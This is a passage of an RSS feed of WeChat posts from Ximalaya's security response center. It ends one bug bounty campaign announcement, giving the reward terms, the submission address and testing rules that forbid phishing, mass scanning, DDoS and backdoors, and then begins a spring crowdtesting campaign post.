normal;text-wrap: wrap;background: rgb(255, 255, 255);padding: 5px 10px;margin-left: auto;margin-right: auto;width: 90%;flex: 0 0 90%;text-align: justify;text-indent: 0em;line-height: 1.6em;max-width: 90% !important;"><span style="text-indent: 2em;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.5px;font-size: 13px;">活动期间提交有效漏洞且漏洞评级为中危及以上，均可获得1.5倍安全币奖励(贡献值不翻倍)</span><br/></section><section style="font-size: 12pt;font-family: Calibri, sans-serif;color: rgb(0, 0, 0);letter-spacing: normal;text-wrap: wrap;background: rgb(255, 255, 255);padding: 5px 10px;margin-left: auto;margin-right: auto;width: 90%;flex: 0 0 90%;text-align: right;text-indent: 0em;margin-top: 0px;line-height: 1.6em;max-width: 90% !important;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 10px;"><span style="font-size: 10px;color: rgb(0, 0, 0);text-align: right;text-indent: 32px;text-wrap: wrap;text-decoration-style: solid;text-decoration-color: rgb(0, 0, 0);letter-spacing: 0.5px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;background-image: initial;background-position: initial;background-size: initial;background-repeat: initial;background-attachment: initial;background-origin: initial;background-clip: initial;"> </span><span style="font-size: 10px;font-family: 微软雅黑, sans-serif;letter-spacing: 0.5px;text-indent: 2em;"> *注:报告奖励为附加奖励不算在翻倍内</span></span></section><section data-mpa-template="t" mpa-from-tpl="t"><section data-mpa-template="t" mpa-from-tpl="t"><p style="margin-left: 8px;margin-right: 8px;visibility: visible;"><strong style="visibility: visible;" mpa-from-tpl="t"><span style="color: rgb(34, 34, 34);font-family: PingFangSC-Light;font-size: 20px;visibility: visible;" data-style="color: rgb(34, 34, 34); font-family: PingFangSC-Light; font-size: 20px;" class="js_darkmode__11"><span data-mpa-emphasize-underline="t" style="display: inline-table;box-sizing: border-box;transform-style: preserve-3d;text-indent: 0em;visibility: visible;"><span style="font-size: 20px;color: rgb(34, 34, 34);transform: translate3d(0px, 0px, 1px);display: inline-block;font-weight: bold;visibility: visible;" data-style="font-size: 20px; color: rgb(34, 34, 34); transform: translate3d(0px, 0px, 1px); display: inline-block; font-weight: bold;" class="js_darkmode__12" mpa-is-content="t">提交地址：</span><span data-mpa-emphasize-underline-bg-line="t" style="width: 100%;height: 6px;background-color: rgb(248, 206, 64);display: block;border-radius: 2px;margin-top: -6px;transform: translate3d(0px, -4px, 0px);visibility: visible;" data-style="width: 100%; height: 6px; background-color: rgb(248, 206, 64); display: block; border-radius: 2px; margin-top: -6px; transform: translate3d(0px, -4px, 0px);" class="js_darkmode__13"></span></span></span></strong></p></section></section><section style="background-image: initial;background-position: initial;background-size: initial;background-repeat: initial;background-attachment: initial;background-origin: initial;background-clip: initial;text-indent: 0em;line-height: 3em;"><span style="color: rgb(0, 0, 0);letter-spacing: 0.5px;" data-style="color: rgb(0, 0, 0); letter-spacing: 0.5px;" class="js_darkmode__32"><strong style="font-family: 黑体, SimHei;letter-spacing: 0.25px;" data-style="color: rgb(0, 0, 0); font-family: 黑体, SimHei; letter-spacing: 0.25px;" class="js_darkmode__33"><span style="background-image: initial;background-position: initial;background-size: initial;background-repeat: initial;background-attachment: initial;background-origin: initial;background-clip: initial;font-size: 20px;" data-style="color: rgb(0, 0, 0); background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; font-size: 20px;" class="js_darkmode__34 js_darkmode__text__11"></span></strong></span></section><section style="font-size: 12pt;font-family: Calibri, sans-serif;color: rgb(0, 0, 0);letter-spacing: normal;text-wrap: wrap;background: none center center / auto repeat rgb(255, 255, 255);line-height: 3em;padding: 5px 10px;margin-left: auto;margin-right: auto;width: 90%;flex: 0 0 90%;text-align: justify;text-indent: 0em;max-width: 90% !important;" data-style="margin-right: 0cm; margin-left: 0cm; font-size: 12pt; font-family: Calibri, sans-serif; color: rgb(0, 0, 0); letter-spacing: normal; background: white; text-indent: 2em; line-height: 3em;" class="js_darkmode__35"><span style="letter-spacing: 0.5px;text-indent: 2em;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 13px;"><a href="https://security.ximalaya.com/" target="_blank">https://security.ximalaya.com/</a></span></section></section></section></section></section><section style="margin: 10px auto;line-height: 3em;"><section style="display: flex;justify-content: flex-end;margin-top: -25px;"><section style="width: 30px;"><img class="rich_pages wxw-img" data-backh="30" data-backw="30" data-imgfileid="100000822" data-ratio="1" style="display: block;vertical-align: inherit;transform: rotateY(180deg);width: 30px !important;visibility: visible !important;" data-type="gif" data-w="363" data-width="100%" src="https://wechat2rss.xlab.app/img-proxy/?k=9dbb2212&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2F6b7G0YdALRzfH6LdlGrZc28P15bxia4MMuGlReyqjzVpj9DUjicYbicGp79j3e7houiaZKEjoEs1H0G0iaMtBooE8PQ%2F640%3Fwx_fmt%3Dgif%26wxfrom%3D13%26tp%3Dwxpic"/></section></section></section></section><section style="line-height: 3em;"><section style="margin: 10px auto;display: flex;justify-content: center;"><section><section style="display: flex;justify-content: center;margin-bottom: -6px;"><section style="width: 35px;height: 0px;overflow: hidden;"><br/></section></section><section style="border-radius: 5px;background-color: rgb(253, 209, 73);padding: 4px;" data-style="border-radius: 5px; background-color: rgb(253, 209, 73); padding: 4px;" class="js_darkmode__125"><section style="background-color: rgb(255, 255, 255);border-radius: 5px;padding: 4px 15px;" data-style="background-color: rgb(255, 255, 255); border-radius: 5px; padding: 4px 15px;" class="js_darkmode__126"><p style="line-height:2.5em;"><span style="font-family: 黑体, SimHei;color: rgb(0, 0, 0);letter-spacing: 0.5px;font-size: 24px;"><strong data-brushtype="text" class="js_darkmode__text__49">注意事项</strong></span></p></section></section></section></section></section><section data-tools="135编辑器" data-id="128736" data-width="90%" style="margin-left: auto;margin-right: auto;width: 90%;flex: 0 0 90%;max-width: 90% !important;"><section style="background-color: rgb(242, 249, 255);padding-right: 10px;padding-bottom: 10px;padding-left: 10px;line-height: 3em;" data-style="background-color: rgb(242, 249, 255); padding-right: 10px; padding-bottom: 10px; padding-left: 10px; line-height: 3em;" class="js_darkmode__128"><section style="display: flex;justify-content: space-around;align-items: flex-start;transform:                                    translateY(-2px);-webkit-transform:                                    translateY(-2px);-moz-transform:                                    translateY(-2px);-o-transform:                                    translateY(-2px);"><section style="width: 15px;height: 10px;border-radius: 0px 0px 15px 15px;background-color: rgb(205, 234, 255);overflow: hidden;" data-style="width: 15px; height: 10px; border-radius: 0px 0px 15px 15px; background-color: rgb(205, 234, 255); overflow: hidden;" class="js_darkmode__129"><br/></section><section style="width: 15px;height: 10px;border-radius: 0px 0px 15px 15px;background-color: rgb(205, 234, 255);overflow: hidden;" data-style="width: 15px; height: 10px; border-radius: 0px 0px 15px 15px; background-color: rgb(205, 234, 255); overflow: hidden;" class="js_darkmode__130"><br/></section><section style="width: 15px;height: 10px;border-radius: 0px 0px 15px 15px;background-color: rgb(205, 234, 255);overflow: hidden;" data-style="width: 15px; height: 10px; border-radius: 0px 0px 15px 15px; background-color: rgb(205, 234, 255); overflow: hidden;" class="js_darkmode__131"><br/></section><section style="width: 15px;height: 10px;border-radius: 0px 0px 15px 15px;background-color: rgb(205, 234, 255);overflow: hidden;" data-style="width: 15px; height: 10px; border-radius: 0px 0px 15px 15px; background-color: rgb(205, 234, 255); overflow: hidden;" class="js_darkmode__132"><br/></section><section style="width: 15px;height: 10px;border-radius: 0px 0px 15px 15px;background-color: rgb(205, 234, 255);overflow: hidden;" data-style="width: 15px; height: 10px; border-radius: 0px 0px 15px 15px; background-color: rgb(205, 234, 255); overflow: hidden;" class="js_darkmode__133"><br/></section><section style="width: 15px;height: 10px;border-radius: 0px 0px 15px 15px;background-color: rgb(205, 234, 255);overflow: hidden;" data-style="width: 15px; height: 10px; border-radius: 0px 0px 15px 15px; background-color: rgb(205, 234, 255); overflow: hidden;" class="js_darkmode__134"><br/></section><section style="width: 15px;height: 10px;border-radius: 0px 0px 15px 15px;background-color: rgb(205, 234, 255);overflow: hidden;" data-style="width: 15px; height: 10px; border-radius: 0px 0px 15px 15px; background-color: rgb(205, 234, 255); overflow: hidden;" class="js_darkmode__135"><br/></section><section style="width: 15px;height: 10px;border-radius: 0px 0px 15px 15px;background-color: rgb(205, 234, 255);overflow: hidden;" data-style="width: 15px; height: 10px; border-radius: 0px 0px 15px 15px; background-color: rgb(205, 234, 255); overflow: hidden;" class="js_darkmode__136"><br/></section><section style="width: 15px;height: 10px;border-radius: 0px 0px 15px 15px;background-color: rgb(205, 234, 255);overflow: hidden;" data-style="width: 15px; height: 10px; border-radius: 0px 0px 15px 15px; background-color: rgb(205, 234, 255); overflow: hidden;" class="js_darkmode__137"><br/></section><section style="width: 15px;height: 10px;border-radius: 0px 0px 15px 15px;background-color: rgb(205, 234, 255);overflow: hidden;" data-style="width: 15px; height: 10px; border-radius: 0px 0px 15px 15px; background-color: rgb(205, 234, 255); overflow: hidden;" class="js_darkmode__138"><span style="color: rgb(0, 0, 0);letter-spacing: 0.5px;"><br/></span></section></section></section><section style="background-color: rgb(255, 255, 255);padding: 5px 10px;" data-style="background-color: rgb(255, 255, 255); padding: 5px 10px;" class="js_darkmode__139"><section style="margin: 10px auto;line-height: 1.6em;"><section style="display: flex;align-items: center;margin-bottom: 15px;"><section style="width: 100%;display: flex;" data-width="100%"><section style="width: 100%;" data-width="100%"><section style="background-color: rgb(242, 249, 255);padding: 10px 12px;" data-style="background-color: rgb(242, 249, 255); padding: 10px 12px;" class="js_darkmode__140"><section style="line-height: 1.75em;color: rgb(51, 51, 51);background-color: transparent;"><p style="text-align: justify;line-height: 2.5em;"><span style="font-size: 13px;"><span style="color: rgb(0, 0, 0);text-align: start;background-color: transparent;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.5px;caret-color: rgb(255, 0, 0);">❗️</span><span style="letter-spacing: normal;color: rgb(0, 0, 0);text-align: start;caret-color: rgb(0, 0, 0);background-color: transparent;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;">禁止社会工程学、钓鱼等非技术性测试。</span></span></p><article style="font-size: 14px;letter-spacing: normal;caret-color: rgb(0, 0, 0);color: rgb(0, 0, 0);text-align: start;text-wrap: wrap;"><p><span style="background-color: transparent;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 13px;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;color: rgb(0, 0, 0);letter-spacing: 0.5px;text-align: start;caret-color: rgb(255, 0, 0);text-wrap: wrap;background-color: rgb(242, 249, 255);">❗️</span>禁止对网站后台和项目使用大规模扫描器。</span></p><p><span style="background-color: transparent;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 13px;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;color: rgb(0, 0, 0);letter-spacing: 0.5px;text-align: start;caret-color: rgb(255, 0, 0);text-wrap: wrap;background-color: rgb(242, 249, 255);">❗️</span>禁止进行可能引起业务异常运行的测试，例如：IIS的拒绝服务等可导致拒  绝服务的漏洞测试以及DDOS攻击。</span></p><p><span style="background-color: transparent;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 13px;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;color: rgb(0, 0, 0);letter-spacing: 0.5px;text-align: start;caret-color: rgb(255, 0, 0);text-wrap: wrap;background-color: rgb(242, 249, 255);">❗️</span>测试漏洞仅限证明性测试，严禁破坏性测试，严禁权限维持、植入后门等行为，若无意中造成危害，应及时报告。</span></p><p><span style="font-size: 13px;"><span style="color: rgb(0, 0, 0);letter-spacing: 0.5px;text-align: start;caret-color: rgb(255, 0, 0);text-wrap: wrap;background-color: rgb(242, 249, 255);">❗️</span>对于一切违反测试规范的行为，XMSRC保留追究其法律责任的权利。</span></p><p><span style="background-color: transparent;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 13px;"><span style="font-size: 13px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;color: rgb(0, 0, 0);letter-spacing: 0.5px;text-align: start;caret-color: rgb(255, 0, 0);text-wrap: wrap;background-color: rgb(242, 249, 255);">❗️</span>XMSRC对本次活动相关规则保留最终解释权</span></p></article></section></section></section></section></section></section></section><section style="margin: 10px auto;line-height: 3em;"><section style="display: flex;justify-content: flex-end;margin-top: -25px;"><section style="width: 30px;"><br/></section><section style="width: 30px;"><br/></section><section style="width: 30px;"><br/></section><section style="width: 30px;"><br/></section><section style="width: 30px;"><br/></section><section style="width: 30px;"><br/></section><section style="width: 30px;"><br/></section><section style="width: 30px;"><br/></section><section style="width: 30px;"><br/></section><section style="width: 30px;"><br/></section><section style="width: 30px;text-align: left;"><img class="rich_pages wxw-img __bg_gif" data-backh="30" data-backw="30" data-imgfileid="100000823" data-ratio="1" style="display: block;vertical-align: inherit;transform: rotateY(180deg);width: 30px !important;visibility: visible !important;" data-type="gif" data-w="363" data-width="100%" src="https://wechat2rss.xlab.app/img-proxy/?k=d702106f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2F6b7G0YdALRzfH6LdlGrZc28P15bxia4MMuGlReyqjzVpj9DUjicYbicGp79j3e7houiaZKEjoEs1H0G0iaMtBooE8PQ%2F640%3Fwx_fmt%3Dgif%26tp%3Dwxpic%26wxfrom%3D5%26wx_lazy%3D1"/></section></section></section></section></section><section data-mpa-template="t" mpa-from-tpl="t"><section data-mpa-template="t" mpa-from-tpl="t" style="margin: 0px 0px 24px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-family: system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: 0.544px;orphans: 2;text-align: justify;text-indent: 0px;text-transform: none;white-space: normal;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;background-color: rgb(255, 255, 255);text-decoration-style: initial;text-decoration-color: initial;visibility: visible;"><section mpa-from-tpl="t" style="margin: 0px;padding: 5px;outline: 0px;max-width: 100%;box-sizing: border-box;border-width: 2px;border-style: solid;border-color: rgb(205, 164, 76);visibility: visible;overflow-wrap: break-word !important;"><section mpa-from-tpl="t" style="margin: 0px;padding: 10px;outline: 0px;max-width: 100%;box-sizing: border-box;overflow-wrap: break-word !important;border-width: 1px;border-style: solid;border-color: rgb(228, 205, 157);visibility: visible;"><section style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;text-align: center;clear: both;min-height: 1em;text-indent: 2em;line-height: normal;visibility: visible;box-sizing: border-box !important;overflow-wrap: break-word !important;" mpa-from-tpl="t"><strong style="letter-spacing: 0.578px;text-align: center;text-wrap: wrap;background-color: rgb(255, 255, 255);"><span style="caret-color: rgb(0, 0, 0);color: rgb(0, 0, 0);font-family: -webkit-standard;letter-spacing: normal;text-align: start;"><br/></span></strong></section><section style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;text-align: center;clear: both;min-height: 1em;line-height: normal;visibility: visible;text-indent: 0em;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span style="font-size: 16px;"><strong style="letter-spacing: 0.578px;text-align: center;text-wrap: wrap;background-color: rgb(255, 255, 255);"><span style="font-size: 16px;caret-color: rgb(0, 0, 0);color: rgb(0, 0, 0);font-family: -webkit-standard;letter-spacing: normal;text-align: start;">据《喜马拉雅SRC漏洞处理规则及评分V3.0》中所规定的漏洞评级标准进行漏洞评级</span></strong></span></section><section style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;text-align: left;clear: both;min-height: 1em;text-indent: 2em;line-height: normal;visibility: visible;box-sizing: border-box !important;overflow-wrap: break-word !important;" mpa-from-tpl="t"><strong style="text-align: left;text-indent: 2em;font-family: system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: var(--articleFontsize);letter-spacing: 0.578px;"><span style="caret-color: rgb(0, 0, 0);color: rgb(0, 0, 0);font-family: -webkit-standard;letter-spacing: normal;"><strong style="color: rgb(34, 34, 34);font-family: system-ui, -apple-system, &#34;system-ui&#34;, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.578px;text-align: center;"><span style="color: rgb(0, 0, 0);font-family: -webkit-standard;letter-spacing: normal;text-align: start;font-size: 13px;"><br/></span></strong></span></strong></section><section style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;text-align: center;clear: both;min-height: 1em;line-height: normal;visibility: visible;text-indent: 0em;box-sizing: border-box !important;overflow-wrap: break-word !important;"><strong style="text-align: left;text-indent: 2em;font-family: system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: var(--articleFontsize);letter-spacing: 0.578px;"><span style="caret-color: rgb(0, 0, 0);color: rgb(0, 0, 0);font-family: -webkit-standard;letter-spacing: normal;"><strong style="color: rgb(34, 34, 34);font-family: system-ui, -apple-system, &#34;system-ui&#34;, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.578px;text-align: center;"><span style="color: rgb(0, 0, 0);font-family: -webkit-standard;letter-spacing: normal;text-align: start;font-size: 13px;"><img class="rich_pages wxw-img" data-galleryid="" data-imgfileid="100000821" data-ratio="1.1236749116607774" data-s="300,640" style="height: 163px;letter-spacing: 0.578px;text-align: center;width: 145px;" data-type="png" data-w="283" src="https://wechat2rss.xlab.app/img-proxy/?k=f7fc107c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FbNibSwNU98ib9daZQqWMwqJZJWGprR6uBlZOUXwoHNCX0plFxnsziaSBCgQypiaYNDPXy1HYjNKicG5AkYmYvuibbkqA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/>       <strong style="letter-spacing: 0.578px;text-align: center;"><span style="letter-spacing: normal;text-align: start;"><img class="rich_pages wxw-img" data-galleryid="" data-imgfileid="100000820" data-ratio="1.1236749116607774" data-s="300,640" style="height: 163px;letter-spacing: 0.578px;text-align: center;width: 145px;" data-type="png" data-w="283" src="https://wechat2rss.xlab.app/img-proxy/?k=c60936e9&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FbNibSwNU98ib9daZQqWMwqJZJWGprR6uBlsOjJX9EfLqLJoQgxpGmXgVgU1XDtPyfHaqPDDUPQvaWibribQAniahCpA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/>   </span></strong></span></strong></span></strong><br/></section><section style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;text-align: justify;clear: both;min-height: 1em;text-indent: 2em;line-height: normal;visibility: visible;" mpa-from-tpl="t"><br/></section></section></section></section></section><section class="mp_profile_iframe_wrp"><mp-common-profile class="js_uneditable custom_select_card mp_profile_iframe" data-pluginname="mpprofile" data-id="MzI3Mzk4MDQ5NQ==" data-headimg="http://mmbiz.qpic.cn/mmbiz_png/bNibSwNU98ib9JD0f8Iq5cXAbKpViaicStFMXZXbHAricLXbhWGNrPF0h4VwMGk4x8zzd9GNCIicqCvCiakK6468pKibbg/0?wx_fmt=png" data-nickname="喜马拉雅安全响应平台" data-alias="XimalayaSecurity" data-signature="喜马拉雅安全响应中心" data-from="0" data-is_biz_ban="0"></mp-common-profile></section><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="2247484473">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=81e6ae3c&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzI3Mzk4MDQ5NQ%3D%3D%26mid%3D2247484473%26idx%3D1%26sn%3D9437b5f82c3f258681261e2972002e66%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Mon, 21 Oct 2024 16:15:00 +0800</pubDate>
    </item>
    <item>
      <title>春日迎好运，奖励翻倍大派送</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzI3Mzk4MDQ5NQ==&amp;mid=2247483878&amp;idx=1&amp;sn=5d9fccdc608e67d9547fbf1015f1e212</link>
      <description>春日专项众测活动重磅来袭，诚邀各位师傅参加～</description>
      <content:encoded><![CDATA[<p>
<span>XMSRC</span> <span>2024-04-01 15:13</span> <span style="display: inline-block;">上海</span>
</p>

<p>春日专项众测活动重磅来袭，诚邀各位师傅参加～</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=5a10fead&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FbNibSwNU98ib8HaE7Zlz6mtUNdTZjSxa5IWEHyMlVQp23eibro13NPTDyKrQed3XXf6EoIhs6ZKWRHcSPCgDx2Jwg%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<section style="background-color: rgb(235, 247, 255);font-size: 16px;"><section style="display: flex;width: 100%;flex-flow: column;" powered-by="xiumi.us"><section style="z-index: 2;" powered-by="xiumi.us"><section style="text-align: center;margin-bottom: -40px;line-height: 0;pointer-events: none;"><section style="vertical-align: middle;display: inline-block;line-height: 0;pointer-events: none;"><img data-imgfileid="100000215" data-ratio="0.27" data-s="300,640" style="vertical-align: middle;width: 100%;" data-type="gif" data-w="500" src="https://wechat2rss.xlab.app/img-proxy/?k=b437634b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_gif%2FbNibSwNU98ib8HaE7Zlz6mtUNdTZjSxa5IkX6n81CicdC9EWwUyDKYkXYXKYLkZdSTgC4QPYj4AsJ5ib7qbwAYWzYQ%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></section></section></section></section><section style="display: grid;width: 100%;overflow: hidden;align-self: flex-start;line-height: 1.6;letter-spacing: 0px;color: rgb(0, 0, 0);grid-template-columns: 100%;grid-template-rows: 100%;" powered-by="xiumi.us"><section style="height: 100%;width: 100%;margin-left: 0%;margin-top: 0%;grid-column-start: 1;grid-row-start: 1;transform: rotate(0deg);" powered-by="xiumi.us"><section style="text-align: center;line-height: 0;height: 100%;pointer-events: none;"><section style="vertical-align: middle;display: inline-block;line-height: 0;width: 100%;pointer-events: none;"><img data-imgfileid="100000216" data-ratio="1.028" data-s="300,640" style="vertical-align: middle;width: 100%;" data-type="gif" data-w="500" src="https://wechat2rss.xlab.app/img-proxy/?k=0bb15ca6&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_gif%2FbNibSwNU98ib8HaE7Zlz6mtUNdTZjSxa5I93MVTiclb1nkjvmGqBeb55Io2zDyjmy5WKLeVBfEQtyMkIsjY2pOvHQ%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></section></section></section><section style="width: 92%;transform: rotate(0deg);margin-left: 5.81667%;margin-top: 41.9759%;grid-column-start: 1;grid-row-start: 1;height: max-content;" powered-by="xiumi.us"><section style="height: 100%;"><section style="font-size: 38px;color: rgb(255, 255, 255);text-align: center;font-family: FZHei-B01;text-shadow: rgb(56, 157, 213) 1px 1px 0px, rgb(56, 157, 213) 1px -1px 0px, rgb(56, 157, 213) -1px 1px 0px, rgb(56, 157, 213) -1px -1px 0px, rgb(56, 157, 213) 0px 1.4px 0px, rgb(56, 157, 213) 0px -1.4px 0px, rgb(56, 157, 213) -1.4px 0px 0px, rgb(56, 157, 213) 1.4px 0px 0px;letter-spacing: 1px;line-height: 1.2;"><p><strong>春日好运</strong></p><p><strong>正在派送</strong></p></section></section></section><section style="width: 92%;transform: rotate(0deg);margin-left: 5.81667%;margin-top: 34.4538%;grid-column-start: 1;grid-row-start: 1;height: max-content;" powered-by="xiumi.us"><section style="height: 100%;"><section style="font-size: 14px;color: rgb(255, 255, 255);text-align: center;font-family: FZHei-B01;letter-spacing: 3px;line-height: 2;padding-right: 20px;padding-left: 20px;"><p>HAPPY SPRING</p></section></section></section><section style="grid-column-start: 1;grid-row-start: 1;padding-top: 102.8%;"><svg viewBox="0 0 1 1" style="float:left;line-height:0;width:0;vertical-align:top;"></svg></section></section><p style="text-wrap: wrap;" powered-by="xiumi.us"><br/></p><section style="text-align: center;justify-content: center;display: flex;flex-flow: row;" powered-by="xiumi.us"><section style="display: inline-block;width: 90%;vertical-align: top;background-color: rgb(255, 255, 255);flex: 0 0 auto;height: auto;border-style: dashed;border-width: 1px;border-color: rgb(162, 209, 255);align-self: flex-start;"><section style="opacity: 0.89;margin-top: -20px;" powered-by="xiumi.us"><section style="display: inline-block;width: 40px;height: 40px;vertical-align: top;overflow: hidden;border-radius: 100%;border-width: 2px;border-style: none;border-color: rgb(255, 255, 255);background-color: rgb(189, 222, 247);"><section style="margin-right: 0%;margin-left: 0%;" powered-by="xiumi.us"><section style="font-size: 20px;color: rgb(33, 58, 97);line-height: 2;"><p><br/></p></section></section></section></section><section style="text-align: justify;" powered-by="xiumi.us"><p style="text-wrap: wrap;"><br/></p></section><section style="justify-content: center;display: flex;flex-flow: row;" powered-by="xiumi.us"><section style="display: inline-block;width: auto;vertical-align: top;min-width: 10%;flex: 0 0 auto;height: auto;border-bottom: 1px dashed rgb(140, 214, 255);border-bottom-right-radius: 0px;align-self: flex-start;"><section style="color: rgb(114, 113, 113);font-size: 14px;line-height: 2;letter-spacing: 2px;text-align: justify;" powered-by="xiumi.us"><p style="text-wrap: wrap;"><span style="font-size: 16px;">XMSRC春日专项众测活动重磅来袭</span><br/></p></section></section></section><section style="justify-content: center;display: flex;flex-flow: row;" powered-by="xiumi.us"><section style="display: inline-block;width: auto;vertical-align: top;min-width: 10%;flex: 0 0 auto;height: auto;border-bottom: 1px dashed rgb(140, 214, 255);border-bottom-right-radius: 0px;align-self: flex-start;"><section style="color: rgb(114, 113, 113);font-size: 14px;line-height: 2;letter-spacing: 2px;text-align: justify;" powered-by="xiumi.us"><p style="text-wrap: wrap;"><span style="font-size: 16px;">诚邀各位师傅参加～</span></p></section></section></section><section style="text-align: justify;color: rgb(114, 113, 113);" powered-by="xiumi.us"><p style="text-align: center;text-wrap: wrap;">( ＞◡❛)</p><p style="text-align: center;text-wrap: wrap;"><br/></p></section></section></section><section style="display: flex;width: 100%;flex-flow: column;" powered-by="xiumi.us"><section style="z-index: 2;" 